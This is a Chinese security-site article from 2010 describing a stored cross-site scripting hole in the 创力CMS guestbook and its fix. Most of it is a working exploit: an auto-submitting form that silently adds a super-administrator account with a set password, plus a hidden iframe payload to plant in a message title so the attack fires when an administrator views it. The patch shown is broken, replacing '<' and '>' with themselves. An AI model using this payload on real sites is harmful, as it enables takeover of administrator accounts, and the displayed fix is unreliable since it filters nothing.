频道栏目
首页 > 安全 > 网站安全 > 正文

创力CMS留言板跨站漏洞利用及修复

2010-08-28 12:16:10           
收藏   我要投稿

在留言标题直接插入更新语句,未进行任何过滤,导致XSS跨站漏洞

漏洞利用:首先拥有一个自己可控的网站,然后构造表单:

<html>
<form method="post" action="asp">https://www.2cto.com/admin/Admin_Admin.asp?" name="form1">
<input name="UserName" value="test"> <!--后台ID-->
<input name="Action" type="hidden" id="Action" value="SaveAdd">
<input name="AddUser" value="test"> <!--前台ID--> <input type="password" name="Password" value="qing520"> <!--密码--> <input type="password" name="PwdConfirm" value="qing520"> <!--重复密码--> <input name="Purview_0" type="radio" value="1" onClick="PurviewDetail.style.display=none" checked> <!--超级管理员权限--> </form> <script> document.form1.submit(); </script>
</html>

将以上代码保存为qing.asp(文件名随意),并将其上传到自己的可控网站下面,得到你自己的URL地址

在留言标题中插入:

<iframe src=http://www.2cto.com/qing.asp width=0 height=0></iframe>

此漏洞可触发当管理员查看留言内容时直接添加管理员

危险等级:高

漏洞修补:

分别在两个文件末尾的%>前添加代码

function check(s)

s=Replace(s,"<","<")

s=Replace(s,">",">")

check=s

end function

搜索

GuestTitle = Trim(request("GuestTitle"))
替换为

GuestTitle = check(Trim(request("GuestTitle")))

保存即可

相关TAG标签 漏洞 留言板
上一篇:联想网御官网SQL注入漏洞及修复方案
下一篇:管理员防黑客入侵需知道
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站